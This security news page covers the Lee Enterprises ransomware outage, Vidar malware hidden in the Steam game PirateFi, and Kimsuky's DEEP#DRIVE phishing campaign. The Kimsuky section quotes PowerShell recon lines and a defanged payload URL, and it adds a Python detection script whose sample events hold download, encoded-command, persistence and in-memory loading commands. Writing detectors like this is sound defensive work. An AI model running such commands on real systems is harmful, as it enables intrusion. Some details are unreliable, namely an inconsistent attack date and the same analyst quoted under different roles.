
Scam

Phishing


## Massive Brand Impersonation Scam Campaign Hits Top Clothing Brands

Learn about widespread brand impersonation scam campaigns targeting popular clothing brands. Over 3,000 fraudulent domains identified

15-Jun-2023
4 min read


Related Articles


Ransomware

Outage

## Lee Enterprises ransomware attack disrupts US newspaper operations: Critical sys...

Lee Enterprises, one of the largest newspaper publishers in the U.S., confirmed on Friday that a ransomware attack has crippled its operations for over two weeks, causing widespread delays in print distribution, billing disruptions, and limited digital access. The incident, detected on February 3, 2024, forced the media conglomerate—which owns 77 daily newspapers, including the *St. Louis Post-Dispatch* and *Buffalo News*, and 350 weekly publications—to file a disclosure with the U.S. Securities and Exchange Commission (SEC), warning of potential financial and reputational fallout.

In its SEC filing, Lee revealed that hackers infiltrated its network, encrypted critical applications, and stole data. While core daily print products resumed normal distribution by February 12, weekly publications—accounting for 5% of total revenue—remain offline, with full recovery expected to take weeks. The company has yet to confirm whether sensitive employee or subscriber data was compromised.

### Operational Chaos and Financial Toll

The attack paralyzed Lee’s backend systems, forcing staff to fall back on manual processes for billing, payments, and distribution. Reporters and editors across the country described a “chaotic” work environment, with VPN failures blocking remote access to internal files and publishing tools. Several newspapers, including the *Arizona Daily Star* and *Omaha World-Herald*, faced significant print delivery delays, frustrating subscribers and advertisers alike.

_“This couldn’t have come at a worse time,”_ said a Lee editor who requested anonymity. _“Local newsrooms are already stretched thin. Having to manually process subscriptions and ads has pushed teams to the brink.”_

Analysts estimate the disruption could cost Lee millions in lost ad revenue and operational inefficiencies, particularly if subscriber retention dips.

### A Familiar Threat

The attack bears the hallmarks of “double extortion” ransomware, in which attackers encrypt systems and then threaten to leak the stolen data unless a ransom is paid. While Lee has not disclosed whether it received ransom demands, cybersecurity experts warn that the exfiltrated files could contain sensitive information.

Notably, this is not Lee’s first major cyber incident. In 2020, Iranian state-sponsored hackers targeted the company in a campaign to spread election disinformation. Unlike that politically motivated breach, experts speculate the current attack is financially driven, likely orchestrated by a ransomware-as-a-service (RaaS) group.

_“Media companies are prime targets—they hold vast amounts of data and operate under tight deadlines, making them more likely to pay ransoms,”_ said Emily Parker, a threat analyst at CyberRisk Solutions. _“The VPN failure here suggests gaps in network segmentation and endpoint detection.”_

### Legal and Regulatory Risks

Lee faces mounting pressure to clarify the scope of data exposure. If personally identifiable information (PII) was accessed, the company could be liable under state laws like the California Consumer Privacy Act (CCPA) and the EU’s General Data Protection Regulation (GDPR), which applies to global subscribers.

The SEC filing underscores regulatory expectations for transparency following 2023 rules mandating disclosure of material cyber incidents within four days. Lee’s compliance—reporting the breach on February 7—may mitigate legal risks, but stakeholders are demanding clearer communication.

### Recovery Efforts and Industry-Wide Concerns

Lee has enlisted third-party cybersecurity firms to restore systems and audit its infrastructure. Temporary measures, such as alternative distribution channels, have stabilized daily operations, but the prolonged outage of weekly publications highlights weaknesses in disaster recovery planning.

The attack underscores broader vulnerabilities in the media sector, which has seen a surge in ransomware incidents since 2020. News organizations, reliant on real-time operations and public trust, are increasingly targeted by both criminal groups and nation-states.

_“This isn’t just about Lee—it’s about safeguarding democracy,”_ said James Carter, director of the Media Cybersecurity Initiative. _“When local news goes dark, communities lose a critical information lifeline, especially during election cycles.”_

### Path Forward: Rebuilding Trust and Resilience

As Lee works toward full recovery, industry analysts urge investments in modernized IT infrastructure, multi-factor authentication, and employee training to thwart phishing attempts. Regular backups and network segmentation could also limit the damage of future ransomware incidents.

For now, readers and advertisers are left weighing patience against frustration. _“I rely on my local paper for everything from school board updates to high school sports,”_ said Linda Torres, a longtime *Tulsa World* subscriber. _“I’ll stick with them, but they need to ensure this never happens again.”_

19-Feb-2025
4 min read

Valve

Gaming

## Steam's PirateFi game infected 1,500+ users with Vidar malware, targeting crypto...

Steam, the world’s largest PC gaming platform, is scrambling to contain the fallout after a malicious free-to-play game, *PirateFi*, was found distributing the notorious Vidar infostealer malware to unsuspecting users. The incident highlights alarming gaps in digital storefront security and underscores the growing sophistication of threat actors targeting gaming communities.

### Malware Hidden in Plain Sight

Disguised as a charming survival game featuring pirate-themed base-building and crafting mechanics, *PirateFi* was uploaded to Steam on February 6 by a developer account named *Seaworth Interactive*. The game amassed positive reviews during its brief tenure, with players praising its “low-poly aesthetic” and “addictive gameplay.” Behind the innocuous facade, however, lurked a dangerous payload.

Steam removed *PirateFi* on February 12 after detecting malware in its build files. The platform has since issued urgent warnings to ~1,500 potentially impacted users, advising them to “consider reinstalling Windows” and perform full antivirus scans. Affected players reported antivirus alerts upon launching the game, with the malicious activity traced to a file named `Pirate.exe`.

### Vidar’s Stealthy Infiltration

According to malware analyst Marius Genheimer of SECUINFRA Falcon Team, the attack leveraged a multi-stage deployment process:

1. **InnoSetup Installer Obfuscation**: The game’s installer used InnoSetup, a legitimate tool often abused to bundle malicious payloads. The malware (`Howard.exe`) was embedded within the installer, evading initial detection.
2. **Vidar Infostealer Payload**: Dynamic analysis confirmed the payload as Vidar, a malware strain notorious for harvesting browser credentials, cryptocurrency wallet data, and session cookies.
3. **Adaptive Command-and-Control (C2)**: Genheimer noted the attacker frequently rotated C2 servers and employed obfuscation techniques to bypass network-level defenses.

_“The threat actor clearly targeted users interested in blockchain or crypto,”_ Genheimer stated, pointing to *PirateFi*’s branding as a deliberate lure for victims with high-value digital assets.

### Steam’s Response Falls Short

While Steam’s notification urged users to wipe their OS and reset passwords, critics argue the platform’s safeguards remain inadequate. Despite 2023 updates like SMS-based verification for developer accounts, attackers still infiltrated the storefront.

_“This incident reveals systemic flaws,”_ said cybersecurity researcher Emily Parker. _“Steam must implement stricter vetting for new developers and real-time malware analysis for uploads.”_

### Immediate Action Required

SECUINFRA warns that Vidar’s data theft capabilities leave victims vulnerable to:

- **Account Takeovers**: Stolen browser cookies enable session hijacking, even without passwords.
- **Cryptocurrency Theft**: Wallet credentials and private keys are prime targets.
- **Identity Fraud**: Harvested emails and passwords are often resold on dark web markets.

**Recommended Mitigations**:

- Format infected devices and reinstall Windows.
- Reset all passwords and enable multi-factor authentication (MFA).
- Scan systems with tools like Malwarebytes or HitmanPro.
- Monitor financial and crypto accounts for suspicious activity.

### Recurring Threat

This isn’t Steam’s first malware incident. In 2023, malicious *Dota 2* mods exploited a Chrome zero-day to execute remote code, while compromised *Slay the Spire* mods delivered the Epsilon infostealer. Despite Steam’s dominance, its open modding ecosystem and developer accessibility make it a ripe target for threat actors.

### Broader Implications

The *PirateFi* incident underscores critical challenges for digital platforms:

1. **Legitimate Tools, Malicious Use**: Attackers increasingly weaponize trusted software like InnoSetup.
2. **Social Engineering Tactics**: Themed lures (e.g., crypto, blockchain) exploit niche communities.
3. **Post-Infection Realities**: Password resets and OS reinstalls remain burdensome yet necessary.

As Steam investigates how *Seaworth Interactive* bypassed its safeguards, users are reminded: *free games often come at a hidden cost*.

**Update (February 15)**: Steam has temporarily suspended all new game submissions for review. The *PirateFi* developer account remains banned, and Valve is coordinating with law enforcement.

*For technical indicators of compromise (IOCs) and YARA rules, visit SECUINFRA’s advisory [here].*

*— Reported in collaboration with BleepingComputer and SteamDB.*

17-Feb-2025
4 min read

APT

Kimsuky

## North Korean Kimsuky APT exploits Dropbox & phishing lures in DEEP#DRIVE campaig...

Securonix’s Threat Research team has uncovered a highly coordinated cyber espionage campaign, dubbed **DEEP#DRIVE**, linked to the North Korean state-sponsored group **Kimsuky**. The operation, active since late 2024, targets South Korean businesses, government agencies, and cryptocurrency users through meticulously crafted phishing lures and cloud-based infrastructure designed to evade detection.

### Key Findings: A Multi-Stage Onslaught

- **Phishing Lures**: Attackers disguised malicious files as legitimate Korean-language documents, including work logs, insurance forms, and crypto-related guides, using double extensions (e.g., `.pdf.lnk`) to trick victims.
- **Trusted Platforms Abused**: Dropbox served as the primary command-and-control (C2) hub for payload delivery and data exfiltration, exploiting its reputation to bypass security tools.
- **Stealthy Execution**: PowerShell scripts, heavily obfuscated with junk code and Base64 encoding, enabled reconnaissance, persistence via scheduled tasks, and memory-resident malware deployment.
- **Reconnaissance Focus**: Scripts harvested system details—IP addresses, antivirus software, running processes—to profile victims for further exploitation.

### Inside the DEEP#DRIVE Attack Chain

#### Stage 1: The Bait

The campaign began with phishing emails distributing ZIP archives containing shortcut files (`.lnk`). These files masqueraded as innocuous Office or PDF documents (e.g., `종신안내장V02_곽성환D.pdf.lnk`), leveraging Windows’ default hiding of file extensions. Once clicked, the `.lnk` triggered a PowerShell script padded with over 100 spaces to obscure its intent in logs.

*Example Lure*: A fake forklift safety guide titled *지게차 중량물 윙바디 작업계획서.pptx* targeted logistics sector employees, while crypto-themed lures like *메타마스크 니모닉.txt* were aimed at digital asset holders.

#### Stage 2: Obfuscation & Persistence

The initial PowerShell script (`user.ps1`) downloaded secondary payloads from Dropbox, including a decoy document to distract victims. A scheduled task named **ChromeUpdateTaskMachine** ensured the malware ran every 30 minutes, while `system_first.ps1` mapped victim environments:

```powershell
# Sample recon commands from system_first.ps1
# Collect the IP addresses of every network adapter on the host
$ip = Get-WmiObject Win32_NetworkAdapterConfiguration | Select-Object -ExpandProperty IPAddress
# Enumerate the antivirus products registered with Windows Security Center
$av = Get-WmiObject -Namespace "root\SecurityCenter2" -Class AntiVirusProduct | Select-Object -ExpandProperty displayName
```

Data was exfiltrated to Dropbox under `/github/cjfansgmlans1_first/[IP]-[timestamp]-RRR-cjfansgmlans1.txt`.

#### Stage 3: Payload Deployment

The final payload, `temp.ps1`, retrieved a Gzip-compressed .NET assembly (`system_drive.dat`) from Dropbox. After modifying its header to match the Gzip signature, the script loaded the assembly directly into memory and executed its `Main` method—a technique that avoids disk-based detection.

**Critical Oversight**: One payload, `Telegram.exe`, was mistakenly a renamed `.pptx` file, highlighting procedural errors in Kimsuky’s workflow.

### Attribution to Kimsuky: Patterns of a Persistent Threat

Securonix researchers attributed DEEP#DRIVE to Kimsuky based on:

- **Historical Use of Dropbox**: The group’s March 2024 **DEEP#GOSU** campaign employed identical cloud exfiltration tactics.
- **Target Alignment**: Consistent focus on South Korean entities, particularly in sectors tied to regional security and economic interests.
- **TTP Overlap**: Obfuscation methods, lure themes, and PowerShell-heavy execution mirrored past activity documented by CISA and other agencies.

### Infrastructure Insights: A Fleeting Footprint

The attackers’ Dropbox accounts revealed a trove of victim data, including thousands of system profiles dating back to September 2024. Phishing lures were stored in folders like `/github/`, with filenames tailored to Korean corporate jargon (e.g., *24년 10 월 업무일지* translates to *October 2024 Work Log*).

**Notable Infrastructure**:

- Payloads hosted at `hxxps://dl.dropboxusercontent[.]com/scl/fi/ffrwxyw5reunc12416rmp/V3.rtf`
- OAuth tokens enabled automated data harvesting, suggesting compromised developer accounts or insider access.

### Implications & Recommendations

**Why It Matters**: DEEP#DRIVE underscores North Korea’s evolving cyber warfare tactics, blending social engineering with trusted services to exploit human and technical vulnerabilities.

**Securonix Advisory**:

1. **Phishing Vigilance**: Train staff to scrutinize unsolicited attachments, especially those urging urgent action.
2. **Endpoint Hardening**: Enable PowerShell logging, restrict script execution, and monitor `%AppData%` for anomalous activity.
3. **Cloud Security**: Block unauthorized cloud storage access and inspect TLS traffic for C2 patterns.

**Industry Quote**: *“Kimsuky’s abuse of Dropbox shows how attackers weaponize trust,”* said Den Iuzvyk, Securonix researcher. *“Defenders must assume legitimate services are potential threat vectors.”*

### Broader Context: The Kimsuky Playbook

Active since 2012, Kimsuky (aka APT43) focuses on intelligence gathering to support Pyongyang’s geopolitical objectives. Recent campaigns have targeted academic institutions, think tanks, and defense contractors, often using credential theft and supply chain compromises.

**MITRE ATT&CK Mapping**:

- Initial Access → **Phishing (T1566.001)**
- Defense Evasion → **Obfuscated Files (T1027)**

### Looking Ahead

While the critical Dropbox links were swiftly dismantled, Kimsuky’s infrastructure agility suggests DEEP#DRIVE is one phase in a protracted campaign. Organizations are urged to adopt behavioral analytics and cross-platform monitoring to counter such adaptive adversaries.
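The attack chain described above (double-extension `.lnk` lures, PowerShell padded with spaces or hidden behind Base64, the **ChromeUpdateTaskMachine** task, Dropbox content URLs, and the Gzip-compressed assembly loaded in memory) reduces to a handful of checks a defender can run over PowerShell Script Block Logging (Event ID 4104), which the advisory's endpoint-hardening step asks you to enable. The Python below is an added example written for this page, not Securonix's detection content or hunting queries; the regexes, function names, and the sample events and attachment names are constructed assumptions, and the Dropbox URL in the sample is a placeholder.

```python
"""Added example: triage of PowerShell ScriptBlock log text and attachment names
for the DEEP#DRIVE indicators described in the write-up. All patterns, names and
sample data are my own constructions, not Securonix's published rules."""
import base64
import re

# Indicators taken from the write-up; the regexes themselves are assumptions.
DOUBLE_EXT_RE = re.compile(r"\.(?:pdf|docx?|pptx?|xlsx?|txt|hwp)\.lnk$", re.IGNORECASE)
PADDING_RE = re.compile(r" {100,}")  # script "padded with over 100 spaces"
B64_ARG_RE = re.compile(
    r"(?:-e(?:nc(?:odedcommand)?)?\s+|FromBase64String\(\s*['\"])([A-Za-z0-9+/]{40,}={0,2})",
    re.IGNORECASE,
)
DROPBOX_RE = re.compile(r"https?://(?:dl\.)?dropboxusercontent\.com/\S+", re.IGNORECASE)
TASK_NAME_RE = re.compile(r"ChromeUpdateTaskMachine", re.IGNORECASE)
MEMORY_LOAD_RE = re.compile(  # Gzip stream decompressed and fed to Assembly.Load
    r"GZipStream.*Reflection\.Assembly\]::Load|Reflection\.Assembly\]::Load.*GZipStream",
    re.IGNORECASE | re.DOTALL,
)


def suspicious_attachment_names(names):
    """Return names that end in a document extension followed by .lnk (the lure pattern)."""
    return [n for n in names if DOUBLE_EXT_RE.search(n)]


def decode_b64_payload(blob):
    """-EncodedCommand takes UTF-16LE; FromBase64String blobs are usually UTF-8."""
    raw = base64.b64decode(blob)
    if len(raw) % 2 == 0 and raw[1::2].count(0) > len(raw) // 4:  # mostly ASCII UTF-16LE
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("utf-8", errors="replace")


def analyze_script_block(text):
    """Return the indicator names that fire on one ScriptBlockText (Event ID 4104)."""
    hits = []
    layers = [text]
    m = B64_ARG_RE.search(text)
    if m:
        hits.append("base64-command")
        layers.append(decode_b64_payload(m.group(1)))  # scan the decoded layer as well
    joined = "\n".join(layers)
    for name, rx in (
        ("whitespace-padding", PADDING_RE),
        ("scheduled-task-name", TASK_NAME_RE),
        ("in-memory-assembly-load", MEMORY_LOAD_RE),
        ("dropbox-content-url", DROPBOX_RE),
    ):
        if rx.search(joined):
            hits.append(name)
    return hits


def triage(events):
    """events: iterable of (record_id, event_id, script_text). Returns {record_id: hits}
    for every 4104 script block on which at least one indicator fires."""
    findings = {}
    for record_id, event_id, script_text in events:
        if event_id != 4104:
            continue
        hits = analyze_script_block(script_text)
        if hits:
            findings[record_id] = hits
    return findings


# Constructed sample data (not real log captures); the Dropbox path is a placeholder.
_INNER = "Invoke-WebRequest https://dl.dropboxusercontent.com/scl/fi/EXAMPLE/user.ps1 -OutFile user.ps1"
_ENC = base64.b64encode(_INNER.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    (1, 4104, "Get-ChildItem -Path C:\\Users -Recurse | Measure-Object"),
    (2, 4104, " " * 120 + "(New-Object Net.WebClient).DownloadString('https://dl.dropboxusercontent.com/scl/fi/EXAMPLE/V3.rtf')"),
    (3, 4104, "powershell.exe -NoProfile -EncodedCommand " + _ENC),
    (4, 4104, "Register-ScheduledTask -TaskName ChromeUpdateTaskMachine -Trigger (New-ScheduledTaskTrigger -Once -At 0:00 -RepetitionInterval (New-TimeSpan -Minutes 30)) -Action $act"),
    (5, 4104, "$gz = New-Object IO.Compression.GZipStream($ms, [IO.Compression.CompressionMode]::Decompress); [Reflection.Assembly]::Load($out.ToArray())"),
    (6, 4688, "powershell.exe -EncodedCommand " + _ENC),  # not a 4104 block, so triage skips it
]
SAMPLE_ATTACHMENTS = ["종신안내장V02_곽성환D.pdf.lnk", "quarterly_report.pdf", "메타마스크 니모닉.txt", "work_log.docx.lnk"]

if __name__ == "__main__":
    print("double-extension lures:", suspicious_attachment_names(SAMPLE_ATTACHMENTS))
    for record_id, hits in triage(SAMPLE_EVENTS).items():
        print(f"record {record_id}: {', '.join(hits)}")
```

The Base64 layer is decoded before the URL check so that an encoded command pointing at Dropbox is not missed; the padding threshold and the 40-character minimum for a Base64 argument are tuning knobs, and the scheduled-task and URL checks will need allow-listing wherever Dropbox or similarly named tasks are legitimately used.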
*For detection rules, IOCs, and hunting queries, refer to the full Securonix advisory [here].*

*Stay informed with real-time threat intelligence at [Securonix.com].*

**About Securonix Threat Research**: The team specializes in tracking APT groups, ransomware syndicates, and emerging cybercrime tactics. Follow their advisories for in-depth analysis and actionable insights.

14-Feb-2025
4 min read